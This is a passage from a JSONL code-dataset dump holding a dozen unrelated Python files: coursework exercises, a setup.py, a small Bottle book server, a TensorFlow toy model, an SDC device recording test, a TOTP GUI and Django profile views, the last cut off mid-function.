now let's call with attributes for the instantiated class:\n print(\"The office is = \" + self.office)\n print(\"The country is = \" + self.country)\n print(\"The loc_code is = \" + self.loc_code)\n print(\"The vpn_num is = \" + self.vpn_num)\n print(\"The time_zone is = \" + self.time_zone)\n print(\"The link_num is = \" + self.link_num)\n print(\"The wan_speed is = \" + self.wan_speed)\n\n\ndef add_office(new_office, new_details):\n \"\"\"\n Adds in a new \"office\" to the dictionary ebrd_offices dictionary. Note that:\n\n new_office = string()\n new_details = list()\n\n Note that I've added this in case you want to add in \"London\". This doesn't actually\n get called in this example...\n \"\"\"\n pfile = open(r'C:\\temp\\offices.pkl', 'rb')\n ebrd_offices = pickle.load(pfile)\n pfile.close()\n\n ebrd_offices[new_office] = new_details\n\n pfile = open(r'C:\\temp\\offices.pkl', 'wb')\n pickle.dump(ebrd_offices, pfile)\n pfile.close()\n\ndef main():\n\n # Add in London office...\n office = 'London'\n office_details = ['United Kingdom', 'LDN', '200', '0', '2000']\n add_office(office, office_details)\n # Let's create a new object from the list (aka \"instantiate\"), let's use Ashgabat, but for illustrative reasons\n # we'll call this \"ashgabat_instance\"\n ashgabat_instance = Office(\"Ashgabat\")\n\n # now let's display the details using the function inside the Office class - remembering\n # that a function within a class is called a \"method\"\n ashgabat_instance.show_details()\n\n # let's say we just want to know the country:\n print(\"\\n\\nCountry is: \" + ashgabat_instance.country)\n\n # Note that you can also access the list, remembering that this is defined in the class\n # as \"self.office_details\". 
e.g.:\n print(\"\\n\\nCountry from item in list is: \" + ashgabat_instance.office_details[0])\n\n # Cool innit!\n\nif __name__ == '__main__':\n main()","sub_path":"officesObjects/officesWithPickle.py","file_name":"officesWithPickle.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301451672","text":"# COMP3201\n# by Weiming Chen 201504727\n\n# Assignment 5 - LGP program generation structural intron removal\n\nimport random\n\n\ndef printLGP(program):\n operators_set = ['+', '-', '*', '/']\n for i in program:\n if type(i[2]) == str or type(i[3]) == str:\n if type(i[2]) == str:\n print('r' + str(i[0]) + \"=\" + i[2] + operators_set[i[1]] + 'r' + str(i[3]))\n else:\n print('r' + str(i[0]) + \"=\" + 'r' + str(i[2]) + operators_set[i[1]] + i[3])\n else:\n print('r' + str(i[0]) + \"=\" + 'r' + str(i[2]) + operators_set[i[1]] + 'r' + str(i[3]))\n\n\ndef main():\n # setting parameters\n max_prog_length = 6 # 6 instructions in total is the upper limit\n n_calculation_reg = 3 # {r0, r1, r2} and r0 is designated as the output register\n n_input_reg = 2 # {r3, r4}\n n_operators = 4 # {+, -, *, /}\n n_constant = 5 # {1, 2, 3, 4, 5}\n constant_rate = 0.4 # An operand can be a constant with a 40% chance, however, both operands cannot be constants at the same time\n\n ##### 1. 
randomly generate an LGP program with no more than [max_prog_length] instructions\n # Hint: an instruction can be represented by a list of 4 elements,\n # i.e., its return register, operator, first and second operands\n # an LGP program is thus a list of instructions\n\n # student code begins\n\n program = []\n program_len = random.randint(1, max_prog_length)\n # generate the rest of the instructions\n for i in range(program_len):\n if random.random() > constant_rate:\n op1 = random.randint(0, n_calculation_reg - 1)\n op2 = random.randint(0, n_calculation_reg - 1)\n else:\n cons_op = random.randint(1, 2)\n if cons_op == 1:\n op1 = str(random.randint(1, 5))\n op2 = random.randint(0, n_calculation_reg - 1)\n else:\n op1 = random.randint(0, n_calculation_reg - 1)\n op2 = str(random.randint(1, 5))\n\n io_reg = random.randint(0, n_calculation_reg - 1)\n operator = random.randint(0, n_operators - 1)\n program.append([io_reg, operator, op1, op2, i])\n\n # student code ends\n\n ##### 2. print the LGP program as a list of instructions\n # An instruction should be printed as, for instance r1 = r3 + r0 or r2 = r0 * 5\n\n print(\"The randomly generated LGP program is:\")\n\n # student code begins\n printLGP(program)\n\n # student code ends\n\n ##### 3. 
remove a program's structural intron\n program_intron_free = []\n effective_registers = ['r0']\n effective_instruction_indices = []\n\n # student code begins\n program_reverse = program[::-1]\n for i in range(len(program_reverse)):\n if program_reverse[i][0] == 0:\n r0 = program_reverse[i]\n program_intron_free.append(r0)\n effective_instruction_indices.append(r0[4])\n if type(r0[2]) != str: effective_registers.append('r' + str(r0[2]))\n if type(r0[3]) != str: effective_registers.append('r' + str(r0[3]))\n cur_eff = r0\n for j in range(i + 1, len(program_reverse)):\n ins = program_reverse[j]\n if (type(ins[0]) == type(cur_eff[2]) and ins[0] == cur_eff[2]) or (\n type(ins[0]) == type(cur_eff[3]) and ins[0] == cur_eff[3]):\n program_intron_free.append(ins)\n effective_registers.append('r' + str(ins[0]))\n effective_instruction_indices.append(ins[4])\n if type(ins[2]) != str: effective_registers.append('r' + str(ins[2]))\n if type(ins[3]) != str: effective_registers.append('r' + str(ins[3]))\n cur_eff = ins\n break\n if len(effective_instruction_indices) == 0:\n effective_registers = []\n else:\n effective_registers = set(effective_registers)\n effective_registers = list(effective_registers)\n # student code ends\n\n ##### 4. 
print the structual-intron free LGP program\n\n # print the indices of the effective instructions\n print(\"The indices of effective instructions are:\", effective_instruction_indices)\n\n # print the LGP program without structural intron\n print(\"The LGP program withou any structual intron is:\")\n\n # student code begins\n printLGP(program_intron_free)\n\n # student code ends\n\n\n# end of main\n\n\nmain()\n","sub_path":"Assignments/a5/ming/A5.py","file_name":"A5.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305744590","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\nBASE_PATH = Path(__file__).resolve().parent\n\n\n# read the version from the particular file\nwith open(BASE_PATH / \"droplets\" / \"version.py\", \"r\") as f:\n exec(f.read())\n\nDOWNLOAD_URL = (\n f\"https://github.com/zwicker-group/py-droplets/archive/v{__version__}.tar.gz\"\n)\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"py-droplets\",\n package_data={\"droplets\": [\"py.typed\"]},\n packages=find_packages(),\n zip_safe=False, # this is required for mypy to find the py.typed file\n version=__version__,\n license=\"MIT\",\n description=(\n \"Python package for describing and analyzing droplets in experiments and \"\n \"simulations\"\n ),\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"David Zwicker\",\n author_email=\"david.zwicker@ds.mpg.de\",\n url=\"https://github.com/zwicker-group/py-droplets\",\n download_url=DOWNLOAD_URL,\n keywords=[\"emulsions\", \"image-analysis\"],\n python_requires=\">=3.7\",\n install_requires=[\"matplotlib\", \"numpy\", \"numba\", \"scipy\", \"sympy\", \"py-pde\"],\n extras_require={\n \"hdf\": [\"h5py>=2\"],\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: 
Science/Research\",\n \"Topic :: Scientific/Engineering\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155694569","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#Считаем, что архив распакован в папку books, она находится в той же папке, что и все остальные файлы.\n#Заливать 300ГБ на гит -- очень не хочется.\n\nfrom bottle import request, run, route, template\nimport os\n\nimport requests\nimport bs4\nimport random\nimport os\n\nSERVER = \"./server/\"\nBOOKS = SERVER + \"books/\"\n\ndef getAuthorsList():\n\tlist_authors = os.listdir(BOOKS)\n\tif \".DS_Store\" in list_authors:\n\t\tlist_authors.remove(\".DS_Store\")\n\treturn list_authors\n\ndef getBooksByAuthor(author):\n\tlist_books = os.listdir(BOOKS + author + '/')\t\n\treturn list_books\n\n@route('/')\ndef main():\n\tlist_authors = getAuthorsList()\n\tbooks = {}\n\tfor author in list_authors:\n\t\tbooks[author] = getBooksByAuthor(author)\n\tpage = template(SERVER + 'list_of_authors', authors=list_authors, books=books)\n\treturn page\n\n@route('/author//')\ndef getAuthorpage(name):\n\tlist_books = getBooksByAuthor(name)\n\tpage = template(SERVER + 'list_of_books', list_books=list_books, author=name)\n\treturn page\n\n@route('/author//book//')\ndef getBookText(authorName, bookName):\n\tf = open(BOOKS + authorName + '/' + bookName, 'r')\n\tbook_text = f.read()\n\tpage = template(SERVER + 'book_text', text=book_text)\n\treturn page\n\ndef booksMining():\n\n\tif not os.path.exists(BOOKS):\n\t\tos.mkdir(BOOKS)\n\n\tCOUNT_OF_BOOKS = 100\n\tfor i in range(COUNT_OF_BOOKS):\n\t\ttry:\n\t\t\tbookId = random.randint(1000, 15000)\n\t\t\tlink = 
\"https://www.gutenberg.org/ebooks/\" + str(bookId)\n\t\t\t#link = \"https://www.gutenberg.org/ebooks/10516\"\n\t\t\tpage = requests.get(link).text\n\t\t\tsoup = bs4.BeautifulSoup(page, 'html5lib')\n\t\t\th1 = soup.find('h1').text\n\t\t\tidx = h1.rfind(' by ')\n\t\t\tbook = h1[:idx]\n\t\t\tname = h1[idx+4:]\n\n\t\t\tlink = \"http://www.gutenberg.org/cache/epub/\" + str(bookId) + \"/pg\" + str(bookId) + \".txt\"\n\t\t\tpage = requests.get(link).text\n\t\t\tsoup = bs4.BeautifulSoup(page, 'html5lib')\n\t\t\tbook_text = soup.find('body').text\n\n\t\t\tif not os.path.exists(BOOKS + name):\n\t\t\t\tos.mkdir(BOOKS + name)\n\t\t\tif not os.path.exists(BOOKS + name + '/' + book):\n\t\t\t\tf = open(BOOKS + name + '/' + book, 'w')\n\t\t\t\tf.write(book_text)\n\t\t\t\tf.close()\n\t\texcept:\n\t\t\tcontinue\n\n\nbooksMining()\nrun(host='localhost', port=5555, debug=True)\n","sub_path":"problems 8/volodin/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457830779","text":"from gevent import monkey\nmonkey.patch_all()\nimport pandas as pd\nimport flask\nfrom functions.base_functions import *\nimport sys, os\n\ndef batch_process(url, start, end, name):\n \"\"\"Function to batch process crawling function\n Input: CSV URL, index to read, output file name\n Output: CSV Results\"\"\"\n\n input_df = pd.read_csv(url)\n if start == 0 and end == 0:\n end = len(input_df)\n \n df_res = pd.DataFrame({\"merchant_name\": [], \"broken_link_score\": [], \"link_contact_us_exist\": [], \\\n \"cu_email_exist\": [], \"cu_phone_number_exist\": [], \"link_about_us_exist\": [],\\\n \"link_tnc_exist\": [], \"tnc_refund_policy_exist\": [], \"contact_us_score\": [], \\\n \"tnc_score\": [], \"label\": []})\n \n input_df = input_df.reset_index()\n try:\n for i in range(start, end):\n df = input_df[input_df.index == i] \n url = str(df['website'].values[0])\n print(url + \" --> \" 
+ str(i+1-start))\n hyperlinks = get_hyperlinks(url)\n\n broken_df = broken_link_score(df, hyperlinks)\n important_df = important_links_check(df, hyperlinks)\n contact_df = contact_us_score(df, hyperlinks)\n tnc_df = tnc_score(df, hyperlinks)\n\n dfs = [broken_df, important_df, contact_df, tnc_df]\n dfs = [df.set_index(\"merchant_name\") for df in dfs]\n res = pd.concat(dfs, axis=1, sort=False).reset_index()\n res['label'] = df['label'].values[0]\n\n df_res = pd.concat([df_res, res], sort=False)\n\n res_url = './datasets/' + name + '.csv'\n df_res.to_csv(res_url)\n return str(i+1-start) + \" line(s) successfully written.\"\n except:\n res_url = './datasets/' + name + '.csv'\n df_res.to_csv(res_url)\n return \"Error occured. \" + str(i+1-start-1) + \" line(s) successfully written.\" ","sub_path":"api/functions/batch_processor.py","file_name":"batch_processor.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447240436","text":"# encoding:utf-8\n# 正则表达式的示例\n\nimport re\n\n# # 边界匹配的开始匹配 \\A\n# ps = re.match(r\"\\Aimooc[\\w]*\",'imoocwer')\n# print(ps.group())\n#\n# # 边界匹配的结束匹配 \\Z\n# pe = re.match(r'[\\w]*imooc\\Z', 'qweertrimooc')\n# print(pe.group())\n#\n# # 分组匹配 () [\\w]{4,6} 字符 4 到 6 个\n# pg = re.match(r'[\\w]{4,6}@(126|163).com', 'panlei@126.com')\n# print(pg.group())\n# pg = re.match(r'[\\w]{4,6}@(126|163).com', 'panlei@163.com')\n# print(pg.group())\n#\n# # 分组匹配 引用编号\n# pn = re.match(r'<([\\w]+>)[\\w]+Python\")\n# print(pn.group())\n\n# ?P 为分组起一个名字 (?P=name) 引用名字为name的分组\n\n# re模��的其他方法\n# search 方法,查找字符串中的指定字串\nstr1 = \"find number in sentence 100\"\nsear = re.search(r'\\d+', str1)\nprint(sear.group())\n\n# sub方法,实现替换\nstr2 = \"change 1000 into add one\"\ndef addone(match):\n val = match.group()\n num = int(val) + 1\n return str(num)\n\nma = re.sub(r'\\d+', addone, 
str2)\nprint(ma)\n\n\n\n\n","sub_path":"TestBoundary.py","file_name":"TestBoundary.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274724773","text":"import requests\nimport pygal\n\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n# Make an API call and store the response.\nurl = \"https://api.github.com/search/repositories?q=language:python&sort=stars\"\nr = requests.get(url)\nprint(\"Status code: \", r.status_code)\n# Store API reponse in a variable.\nresponse_dict = r.json()\n\n# Process results.\nprint(response_dict.keys())\nprint(\"Total repositories: \", response_dict['total_count'])\n\nrepo_dicts = response_dict['items']\nprint(\"Repositories returned: \", len(response_dict['items']))\n\nrepo_dict = repo_dicts[0]\nprint(\"\\nKeys: \", len(repo_dict))\nprint(\"Full name: \", repo_dict['full_name'])\nprint(\"Name: \", repo_dict['name'])\nprint(\"Owner: \", repo_dict['owner'])\n\nnames, plot_dicts = [], []\nfor repo_dict in repo_dicts:\n names.append(repo_dict['name'])\n plot_dicts.append({'value': repo_dict['stargazers_count'],\n 'label': repo_dict['description'],\n 'xlink': repo_dict['html_url']})\nprint(plot_dicts)\n# Make visualization.\nmy_style = LS('#333366', base_style=LCS)\n# Configuration.\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 3\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Project on Github'\nchart.x_labels = names\n\nchart.add('', 
plot_dicts)\nchart.render_to_file('python_repos.svg')","sub_path":"python_crash_course/data_visualization/python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367129423","text":"#O(N)\n\nfrom collections import deque, defaultdict\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if not root:\n return []\n \n hmap = dict()\n queue = deque([(root, 0)])\n maxCol, minCol = 0, 0\n \n while queue:\n node, col = queue.popleft()\n hmap[col] = hmap.get(col, []) + [node.val]\n if node.left:\n queue.append((node.left, col-1))\n minCol = min(minCol, col-1)\n if node.right:\n queue.append((node.right, col+1))\n maxCol = max(maxCol, col+1)\n \n return [hmap[key] for key in range(minCol, maxCol+1) if key in hmap]","sub_path":"314-Binary Tree Vertical Order Traversal.py","file_name":"314-Binary Tree Vertical Order Traversal.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575011212","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='photocat',\n name='parent',\n field=models.ForeignKey(related_name=b'childs', verbose_name=b'\\xd0\\xa0\\xd0\\xbe\\xd0\\xb4\\xd0\\xb8\\xd1\\x82\\xd0\\xb5\\xd0\\xbb\\xd1\\x8c\\xd1\\x81\\xd0\\xba\\xd0\\xb0\\xd1\\x8f \\xd0\\xba\\xd0\\xb0\\xd1\\x82\\xd0\\xb5\\xd0\\xb3\\xd0\\xbe\\xd1\\x80\\xd0\\xb8\\xd1\\x8f', blank=True, to='app.PhotoCat', null=True),\n 
),\n ]\n","sub_path":"app/migrations/0002_auto_20140927_0834.py","file_name":"0002_auto_20140927_0834.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553299982","text":"import tensorflow as tf\nimport numpy as np\n\nbatch_size = 8\n# 输入数据\nX = np.random.rand(1000, 2)\nY = [[int(x0 + x1 < 1)] for x0,x1 in X]\n\nprint('X:', X)\nprint('Y:', Y)\n\n# 网络结构\nx = tf.placeholder(tf.float32, shape=[None, 2])\ny = tf.placeholder(tf.float32, shape=[None, 1])\n\nw1 = tf.Variable(tf.truncated_normal([2,4], stddev=1, seed=1))\nb1 = tf.Variable(tf.zeros([1,4])+0.1)\nl1 = tf.nn.tanh(tf.matmul(x, w1) + b1)\n\nw2 = tf.Variable(tf.truncated_normal([4,1], stddev=1, seed=1))\nb2 = tf.Variable(tf.zeros([1,1])+0.1)\nl2 = tf.nn.tanh(tf.matmul(l1, w2) + b2)\n\nloss = tf.reduce_mean(tf.square(l2-y))\n\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n\nwith tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n for i in range(1000):\n start = (i*batch_size) % len(X)\n end = start + batch_size\n loss_r = session.run(loss, feed_dict={x:X[start:end], y:Y[start:end]})\n print('iter', i, 'loss', loss_r)\n result = session.run(train, feed_dict={x:X[start:end], y:Y[start:end]})\n test_x = np.random.rand(10, 2)\n test_y = [[int(x0 + x1 < 1)] for x0,x1 in test_x]\n result_test = session.run(l2, feed_dict={x:test_x, y:test_y})\n for i in range(10):\n print(test_x[i], result_test[i], test_y[i])\n\n","sub_path":"tensorflow-learning2/tensorflow0-1分类.py","file_name":"tensorflow0-1分类.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455666008","text":"from __future__ import print_function\r\nfrom __future__ import absolute_import\r\n\r\nimport traceback\r\nimport os\r\nimport shutil\r\nimport uuid\r\nimport sdc11073\r\nimport time\r\nimport 
lxml\r\n\r\nfrom sdc11073 import namespaces\r\nfrom sdc11073.location import SdcLocation\r\nfrom sdc11073.mdib.descriptorcontainers import NumericMetricDescriptorContainer\r\nfrom sdc11073.pmtypes import CodedValue\r\nfrom sdc11073.pysoap.soapenvelope import DPWSThisModel, DPWSThisDevice\r\nfrom sdc11073.sdcdevice import SdcDevice, waveforms\r\nfrom tests.base_test import BaseTest\r\nfrom sdc11073 import pmtypes\r\n\r\n\r\nclass Test_Client_recording(BaseTest):\r\n def setUp(self):\r\n super(Test_Client_recording, self).setUp()\r\n self.setUpCocoDraft10()\r\n self.cleanUpDirs = []\r\n\r\n def tearDown(self):\r\n super(Test_Client_recording, self).tearDown()\r\n self.stopDraft10()\r\n for testDir in self.cleanUpDirs:\r\n try:\r\n shutil.rmtree(testDir)\r\n except:\r\n time.sleep(5)\r\n try:\r\n shutil.rmtree(testDir)\r\n except:\r\n print (traceback.format_exc())\r\n\r\n def testRecording(self):\r\n testFile = \"testFile\"\r\n\r\n # create and start recorder\r\n rec = sdc11073.recording.ClientRecorder(self.sdcClientCocoFinal, \".\", filename=testFile)\r\n rec.startRecording()\r\n self.cleanUpDirs.append(rec.currentRecordingPath)\r\n\r\n # make changes to the mdib\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n mst = mgr.getMetricState('0x34F00100')\r\n if mst.metricValue is None:\r\n mst.mkMetricValue()\r\n mst.metricValue.Value = 12\r\n mst.metricValue.Validity = 'Vld'\r\n mst.metricValue.DeterminationTime = time.time()\r\n metricDescriptor = mgr.getDescriptor('0x34F00100')\r\n metricDescriptor.DeterminationPeriod = 29.0\r\n numericMetricDescriptorContainer = NumericMetricDescriptorContainer(\r\n nsmapper=self.sdcDeviceCoCoFinal.mdib.nsmapper,\r\n nodeName=namespaces.domTag('Metric'),\r\n handle=\"testHandle\",\r\n parentHandle='2.1.1.1' #\"COCO_2827\", #\"\"COCO_3120\",\r\n )\r\n numericMetricDescriptorContainer.Type = CodedValue('11921', 'sys')\r\n numericMetricDescriptorContainer.Unit = CodedValue('11921', 
'sys')\r\n numericMetricDescriptorContainer.Resolution=0.01\r\n mgr.createDescriptor(numericMetricDescriptorContainer)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n metricState = mgr.getMetricState(\"testHandle\")\r\n metricState.Validity = 'Vld'\r\n\r\n time.sleep(1)\r\n\r\n mdsHandle = self.sdcDeviceCoCoFinal.mdib.descriptions.NODETYPE.getOne(sdc11073.namespaces.domTag('MdsDescriptor')).handle\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction() as mgr:\r\n tst = mgr.getComponentState(mdsHandle)\r\n tst.ActivationState = \"StndBy\"\r\n time.sleep(1)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n acst = mgr.getAlertState('0xD3C00100')\r\n acst.Presence = False\r\n time.sleep(1)\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n asst = mgr.getAlertState('0xD3C00100.loc.Vis')#('AlertSignal_0xD3C00100_Aud')\r\n asst.ActivationState = 'On'\r\n time.sleep(1)\r\n\r\n patientDescriptorContainer = self.sdcDeviceCoCoFinal.mdib.descriptions.NODETYPE.getOne(sdc11073.namespaces.domTag('PatientContextDescriptor'))\r\n # create a patient locally on device, then test update from client\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction() as mgr:\r\n st = mgr.getContextState(patientDescriptorContainer.handle)\r\n st.Givenname = 'Max123'\r\n st.Middlename = 'Willy'\r\n st.Birthname = 'Mustermann \\n'\r\n st.Familyname = 'Musterfrau'\r\n st.Title = 'Rex'\r\n st.Sex = 'M'\r\n st.PatientType = pmtypes.PatientType.ADULT\r\n st.Height = sdc11073.pmtypes.Measurement(88.2, sdc11073.pmtypes.CodedValue('abc', 'def'))\r\n st.Weight = sdc11073.pmtypes.Measurement(68.2, sdc11073.pmtypes.CodedValue('abc'))\r\n st.Race = sdc11073.pmtypes.CodedValue('123', 'def')\r\n\r\n newLocation = SdcLocation(fac='tasdaklx', poc='CsadU1', bed='cocoDraft10Bed')\r\n self.sdcDeviceCoCoFinal.setLocation(newLocation, 
[])\r\n\r\n\r\n\r\n paw = waveforms.SawtoothGenerator(min_value=0, max_value=10, waveformperiod=1.1,\r\n sampleperiod=0.01)\r\n self.sdcDeviceCoCoFinal.mdib.registerWaveformGenerator('0x34F05500', paw)\r\n\r\n # record some waveforms and then stop\r\n for x in range(20):\r\n time.sleep(1)\r\n # make changes to the mdib\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=False) as mgr:\r\n mst = mgr.getMetricState('0x34F00100')\r\n mst.metricValue.Value = x\r\n\r\n with self.sdcDeviceCoCoFinal.mdib.mdibUpdateTransaction(setDeterminationTime=True) as mgr:\r\n asst = mgr.getAlertState('0xD3C00100.loc.Vis') #('AlertSignal_0xD3C00100_Aud')\r\n asst.ActivationState = 'Off'\r\n time.sleep(1)\r\n rec.stopRecording()\r\n # verify recording has stopped by monitoring the file size\r\n recordingFile = os.path.join(rec.currentRecordingPath, testFile)+\".rec\"\r\n currentSize = os.path.getsize(recordingFile)\r\n time.sleep(1)\r\n self.assertEqual(currentSize, os.path.getsize(recordingFile))\r\n #\r\n # verify contents have metric and real time updates\r\n with open(recordingFile, 'r') as f:\r\n version = f.readline()\r\n self.assertTrue(\"pysdc ver\" in version)\r\n\r\n mdib = f.readline()\r\n self.assertTrue(\"GetMdibResponse\" in mdib)\r\n\r\n for line in f:\r\n nodeString = line.split(\"|\", 1)[1]\r\n if nodeString.startswith(\"u'\"):\r\n nodeString = nodeString[2:-2]\r\n else:\r\n nodeString = nodeString[1:-2]\r\n node = lxml.etree.fromstring(nodeString)\r\n\r\n if node.tag == namespaces.msgTag('DescriptionModificationReport'):\r\n val = node.xpath('//dom:MetricValue', namespaces=namespaces.nsmap)\r\n self.assertEqual(val[0].attrib['Value'], '12')\r\n f.close()\r\n break\r\n\r\n #verify archive has been created\r\n rec.archive()\r\n expectedZipFile = os.path.join(rec.currentRecordingPath, testFile) + \".zip\"\r\n self.assertTrue(os.path.exists(expectedZipFile))\r\n rec_file = os.path.join(rec.currentRecordingPath, testFile) + \".rec\"\r\n player 
= sdc11073.recording.MdibPlayer()\r\n mdib = player.readRecording(rec_file)\r\n\r\n model = DPWSThisModel(manufacturer=\"Draeger\",\r\n manufacturerUrl=\"draeger.com\",\r\n modelName=\"testMOdel\",\r\n modelNumber=\"231412411241\",\r\n modelUrl=\"draeger.com/testMOdel\",\r\n presentationUrl=\"draeger.com/testMOdel\")\r\n device = DPWSThisDevice(friendlyName=\"SuperDevice\",\r\n firmwareVersion=\"v1.23\",\r\n serialNumber=\"MISAD31245124\")\r\n\r\n self._publishingDevice = SdcDevice(self.wsdiscovery, uuid.uuid1(),\r\n model, device, mdib)\r\n # commLogger = commlog.CommLogger(log_folder=\"testcomm\",\r\n # log_out=True,\r\n # log_in=False,\r\n # broadcastIpFilter=None)\r\n # commlog.defaultLogger = commLogger\r\n\r\n self._publishingDevice.startAll()\r\n loca = SdcLocation(fac='Noneas', poc='CU1', bed='cocoDraft6Bed')\r\n self._publishingDevice.setLocation(loca, [])\r\n player.play(self._publishingDevice, loop=True)\r\n time.sleep(40)\r\n player.stop()\r\n","sub_path":"tests/test_recording.py","file_name":"test_recording.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553298653","text":"#! /usr/bin/env python3\nimport gi, time, pyotp, sys, base64, binascii, os\n\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import Gtk\n\n# ensure a secret is passed\nif len(sys.argv) == 3:\n secret = sys.argv[1]\n name = sys.argv[2]\nelse:\n print(\"Incorrect usage. See README.md for examples.\")\n sys.exit()\n\n# validate the secret\ntry:\n authenticator = pyotp.TOTP(secret)\n authenticator.now()\nexcept binascii.Error:\n print(\"Invalid argument . 
See README.md for examples.\")\n sys.exit()\n\n# create the handlers\nclass Handler:\n def quit(self, *args):\n Gtk.main_quit(*args)\n def generate(self, button):\n entry1 = builder.get_object(\"entry1\")\n entry1.set_text(authenticator.now())\n label1 = builder.get_object(\"label1\")\n label1.set_text(\"Last generated: \" + time.strftime(\"%H:%M:%S\"))\n\n# instantiate gtk and prepare the ui\nbuilder = Gtk.Builder()\ndirectory = os.path.dirname(os.path.realpath(__file__))\nbuilder.add_from_file(directory + \"/gui.glade\")\nbuilder.connect_signals(Handler())\nlabel2 = builder.get_object(\"label2\")\nlabel2.set_text(name)\n\n# boot\nwindow = builder.get_object(\"window1\")\nwindow.show_all()\nGtk.main()\n","sub_path":"googlepythenticator.py","file_name":"googlepythenticator.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154146078","text":"from bookmarks.models import Bookmark\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nfrom .forms import FriendInvitationForm, ProfileForm\nfrom .models import Friendship, Invitation, Profile\n\nUser = get_user_model()\n\n\n@login_required\ndef user_page(request, username):\n user = get_object_or_404(User, username=username)\n # bookmarks = user.bookmark_set.order_by('-id')\n bookmarks = Bookmark.objects.filter(user=user).select_related('user').prefetch_related('tag_set')\n\n # friendship\n is_friend = Friendship.objects.filter(\n from_friend=request.user,\n to_friend=user\n )\n\n # user profile detail\n # profile = Profile.objects.filter(user=request.user).first()\n\n context = {\n 'username': username,\n 'bookmarks': bookmarks,\n 'show_tags': True,\n 'show_edit': username == 
request.user.username,\n 'is_friend': is_friend,\n 'show_profile': username == request.user.username,\n 'show_delete': username == request.user.username,\n # 'profile': profile,\n }\n return render(request, 'profiles/user_page.html', context)\n\n\n@login_required\ndef friends(request, username):\n # if request.user.username != username:\n # return HttpResponseForbidden('Sorry,you don\\'t have permission.')\n\n user = get_object_or_404(User, username=username)\n # The requested user is the `from_friend`\n friend_list = [friendship.to_friend for friendship in user.friend_set.all()]\n friend_bookmarks = Bookmark.objects.filter(user__in=friend_list).order_by('-id')\n context = {\n 'username': username,\n 'friends': friend_list,\n 'bookmarks': friend_bookmarks[:10],\n 'show_tags': True,\n 'show_users': True\n }\n return render(request, 'profiles/friends.html', context)\n\n\n# TODO: need verification (the other side of friendship)\n@login_required\ndef friend_add(request):\n if 'username' in request.GET:\n friend = get_object_or_404(User, 